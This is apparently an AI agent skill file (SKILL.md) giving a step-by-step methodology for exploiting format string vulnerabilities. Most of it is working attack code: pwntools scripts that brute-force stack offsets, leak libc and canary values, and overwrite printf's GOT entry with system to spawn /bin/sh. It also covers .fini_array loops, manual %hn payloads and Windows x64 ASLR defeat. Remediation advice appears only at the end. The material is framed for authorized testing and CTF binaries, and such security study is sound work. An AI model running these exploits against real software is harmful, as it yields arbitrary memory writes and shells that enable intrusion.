exploiting-format-string-vulnerabilities - SKILL.md Agent Skill

name: exploiting-format-string-vulnerabilities description: Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write primitives (%n) to hijack control flow via GOT/.fini_array overwrites. domain: cybersecurity subdomain: binary-exploitation tags:

binary-exploitation
format-string
exploit-development version: '1.0' author: xalgorix license: Apache-2.0

Exploiting Format String Vulnerabilities

When to Use

During authorized binary/exploitation assessments when attacker input is passed as the first argument (the format) to printf, fprintf, sprintf, snprintf, vprintf, syslog, or similar.
When you need a memory-disclosure primitive to leak stack contents, a libc/PIE pointer, or a stack canary to defeat ASLR/PIE/canary protections.
When you have an arbitrary-write primitive opportunity via %n/%hn to overwrite a GOT entry, .fini_array, a saved return address, or a function pointer.
On Windows x64 services where a buggy _snprintf(dst, len, attacker_fmt) call provides no varargs and conversions read pointers out of RCX/RDX/R8/R9 registers.

Critical: Concepts/Steps Most Often Missed

Put the format specifiers BEFORE the target address, not after. printf stops reading at the first NUL byte. If you send p64(addr) + b"%7$s", the address (which contains NUL bytes in its high bytes) terminates the string and the specifiers are never processed. Send b"%7$s" + padding + p64(addr) instead, and align so the address lands on a pointer boundary.
Use %hn (2 bytes), not %n (4 bytes), for full addresses. Writing a 4-byte value like 0x08049724 in one go requires printing billions of characters. Split the write into two %hn operations (high and low halves) and emit the smaller half-value first.
Confirm the offset precisely. Sending AAAA%p%p%p... is not enough; brute-force AAAA%N$p until the output shows 0x41414141 and verify with BBBB that you control a full aligned pointer slot. Off-by-one offset errors silently read the wrong slot.
%n writes are disabled by FORTIFY. _FORTIFY_SOURCE aborts on %n in writable format strings; on those targets you are limited to read primitives (still enough to leak canary/libc and pair with another bug).
Let pwntools do the math. fmtstr_payload() and FmtStr() compute the offset and craft the multi-write payload; manual HOB/LOB arithmetic is error-prone.

How to CONFIRM

A read primitive is confirmed when a chosen %N$p/%N$s returns attacker-known data: send b"AAAA%6$p" and confirm 0x41414141 (or 0x...41414141 on 64-bit) appears in the output — that proves your buffer is at stack arg 6. A write primitive is confirmed by reading back the target: overwrite a GOT entry with a sentinel, then dump it with %s/%p and verify the bytes changed, or set a breakpoint in gdb on the write target and observe the value land.

Workflow

Step 1: Confirm the Bug and Find the Argument Offset

from pwn import *
context.binary = elf = ELF('./chall', checksec=False)

# Brute-force the stack offset where our input lands
for i in range(1, 50):
    p = process('./chall')
    p.sendline(f"AAAA%{i}$p".encode())
    out = p.clean()
    if b"0x41414141" in out:
        log.success(f"Input is at offset {i}")
        p.close(); break
    p.close()

A quick manual probe: %p %p %p %p %p %p printed by a printf(buffer) reveals stack values; %x leaking attacker bytes proves the format string is attacker-controlled.

Step 2: Build the Read Primitive (Leak Stack / libc / Canary)

# Read an arbitrary address: format specifier FIRST, address LAST (no early NUL)
payload  = b"%7$s"            # offset 7 holds our address slot
payload += b"|" * (8 - len(b"%7$s"))   # pad so the pointer is 8-aligned
payload += p64(0x404020)      # address to dereference and print as string
p.sendline(payload)
log.info(p.clean())

# Leak a libc pointer from the stack, then compute base
p.sendline(b"%25$p")
leak = int(p.recvline().strip(), 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc.address = leak - libc.symbols['__libc_start_main'] - 243
log.info("libc base @ %#x", libc.address)

Reads are useful to dump the binary from memory and to grab canaries, encryption keys, or hardcoded passwords stored on the stack/BSS.

Step 3: Build the Write Primitive and Hijack Control Flow

# Let pwntools craft the multi-%hn write. Overwrite printf@GOT -> system
payload = fmtstr_payload(offset, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)
# Next call to printf(user_input) now runs system(user_input)
p.sendline(b'/bin/sh')
p.interactive()

Manual two-step %hn (when not using pwntools), writing high-order then low-order halves with %.<pad>x%<arg>$hn:

# Example: write 0x080497xx split into two 16-bit halves at offsets 4 and 5
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+"%.49143x"+"%4$hn"+"%.15408x"+"%5$hn"'

Step 4: Make the Bug Reusable / Escalate

# If you need another pass through the vulnerable code, overwrite .fini_array
# to loop back to main, then perform the GOT overwrite on the second pass.
fmt = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
fmt.write(elf.symbols['__init_array_end'], INIT_LOOP_ADDR)  # loop back
fmt.write(elf.got['printf'], elf.plt['system'])             # then redirect
fmt.execute_writes()

On Windows x64, prepend %p to leak whatever pointer sits in R9 at the call-site, recover the module base as leak - known_offset, and reuse it to compute gadget/IAT addresses for a ROP chain.

Key Concepts

Concept	Description
Format specifier	`%x`/`%p` read stack words, `%s` dereferences a pointer and prints a string, `%n` writes the byte count to a pointed address.
Direct parameter access	`%N$x` selects the N-th argument directly (e.g. `%4$p` reads the 4th), avoiding long specifier chains.
Argument offset	The stack index at which attacker-controlled input appears; the anchor for both read and write primitives.
`%n` / `%hn` / `%hhn`	Write the number of bytes printed so far into an address: 4 bytes / 2 bytes / 1 byte respectively.
HOB / LOB	High-order and low-order halves of a target address; written separately with two `%hn` operations.
GOT overwrite	Replacing a GOT entry (e.g. `printf`) with another function (e.g. `system`) so the next call is redirected.
`.fini_array` loop	Overwriting a destructor pointer to re-enter `main`, giving extra exploitation passes.
Width padding	`%.<num>d` prints `num` characters cheaply so `%n` writes a large value without huge buffers.

Tools & Systems

Tool	Purpose
pwntools	`fmtstr_payload`, `FmtStr`, `ELF.got`/`ELF.plt`/`ELF.symbols`, process/remote IO, automated offset detection.
gdb + pwndbg/GEF	Inspect the stack at the `printf` call, confirm writes landed, set breakpoints on GOT targets.
checksec	Detect RELRO (full RELRO makes GOT read-only), FORTIFY (`%n` blocked), PIE, canary.
objdump / readelf	Enumerate GOT/PLT entries and `.fini_array`/`.init_array` addresses.
radare2 / Ghidra	Reverse the call-site to confirm the format argument is attacker-controlled and find static offsets (Windows base recovery).
one_gadget	After a libc leak, find a single-shot shell gadget to target with the write.

Common Scenarios

Scenario 1: Stack secret leak (no flow control needed)

printf(buffer) echoes user input. Brute-forcing %N$s reveals a hardcoded password stored on the stack at offset 10, or %N$p leaks a heap/libc address — enough to win without altering execution.

Scenario 2: GOT overwrite to system

A 32-bit no-RELRO binary calls printf(user) in a loop. fmtstr_payload(5, {got['printf']: libc.sym['system']}) redirects printf to system; the next iteration with input /bin/sh spawns a shell.

Scenario 3: ret2win via .fini_array + GOT

A binary with a one-shot format string overwrites .fini_array to loop back to main, then on the second pass writes the win/system address into a GOT slot used right after.

Scenario 4: Windows x64 ASLR defeat

A service does _snprintf(dst, 0xff2, keyData) with no varargs. A leading %p prints the value in R9 — a stable in-module pointer — letting the attacker compute the image base and bootstrap a ROP chain.

Output Format

## Format String Finding

**Vulnerability**: Uncontrolled format string (CWE-134)
**Severity**: Critical (arbitrary read+write -> RCE) / High (info leak only)
**Binary**: ./chall (x86-64, Partial RELRO, No PIE, No FORTIFY)
**Call site**: printf(user_input) in handle_request()

### Primitive Confirmation
- Read: input at stack offset 6 (AAAA%6$p -> 0x...41414141)
- Leak: libc base @ 0x7ffff7da5000 via %25$p
- Write: %hn enabled (no FORTIFY), Partial RELRO -> GOT writable

### Exploitation
fmtstr_payload(6, {got['printf']: libc.sym['system']})
Result: printf("/bin/sh") executed system("/bin/sh") -> shell as service user.

### Impact
Arbitrary memory read/write leading to remote code execution.

### Recommendation
1. Never pass user input as the format argument: use printf("%s", user_input).
2. Compile with -Wformat -Wformat-security -Werror=format-security and _FORTIFY_SOURCE=2.
3. Enable Full RELRO (-Wl,-z,relro,-z,now) to make the GOT read-only.
4. Enable PIE/ASLR and stack canaries.